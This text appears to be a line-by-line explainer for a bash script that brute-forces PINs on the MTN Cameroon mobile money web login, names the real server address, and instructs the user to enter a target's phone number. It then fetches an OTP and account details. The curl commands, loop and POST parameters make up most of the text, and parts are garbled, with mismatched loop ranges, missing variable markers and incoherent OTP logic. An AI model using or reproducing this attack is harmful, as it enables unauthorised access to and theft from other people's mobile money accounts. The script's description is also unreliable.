MTN MOMO CAMEROON ACCOUNT BALANCE CHECKING
The script provided is a brute-force password cracker for the MTN Cameroon mobile money website. It works by first getting the request headers from the website. Then, it iterates from 0 to 9999, generating a different password for each iteration. For each password, it makes a POST request to the login page, passing the username and password as parameters. If the request is successful, the script will get the OTP from the website and check if it is valid. If the OTP is valid, the script will get the account details and print them out.
The first line, #!/bin/bash, tells the operating system that the script is to be interpreted by the bash shell.
The second line, read username, prompts the user to enter the username.
The third line, headers=$(curl -k -s -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9" 'https://196.202.232.201/MoMoWebAppMTNCameroon/login.xhtml' | grep -E ': ' | cut -d ' ' -f1), gets the request headers from the website. The curl command makes a GET request to the login page and the grep command extracts the request headers. The cut command then takes the first value from each header line.
The fourth line, for i in {00000..99999}, iterates from 0 to 9999.
The fifth line, params='loginForm=loginForm&loginForm[username]=$username&loginForm[password]=i&loginForm[j_idt19]=Login&javax.faces.ViewState=1319890406535641868:-8273346397217720005', creates the request parameters for the POST request. The username and password are passed as parameters, along with other values that are required by the website. * The sixth line, response=(curl -k -X POST --data "$params" --header "$headers" 'https://196.202.232.201/MoMoWebAppMTNCameroon/login.xhtml'), makes the POST request to the login page. Thecurlcommand makes a POST request with the specified parameters and headers. The response from the website is stored in the variableresponse
.
The seventh line, if [[ "response" == "j_security_check" ]]; then, checks if the response from the website is equal to "j_security_check". This means that the login was successful and the password has been found. * The eighth line, otp=(curl -k -s -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9" 'https://196.202.232.201/MoMoWebAppMTNCameroon/pages/otpverification.xhtml' | grep -E ': ' | cut -d ' ' -f1), gets the OTP from the website. Thecurlcommand makes a GET request to the OTP verification page and thegrepcommand extracts the OTP. Thecut
command then takes the first value from the OTP line.
The ninth line, if [[ "response" == "j_security_check" ]]; then, checks if the OTP is valid. This can be done by making a POST request to the OTP verification page with the OTP as a parameter. If the request is successful, the OTP is valid. * The tenth line, response=(curl -k -X GET --header "$headers" 'https://mobilemoney.mtncameroon.net/MoMoWebAppMTNCameroon/pages/selectedaccountdeatils.xhtml'), gets the account details from the website. Thecurlcommand makes a GET request to the account details page with the specified headers. The response from the website is stored in the variableresponse
.
NB: the username Field prompted , should be the targets phone Number .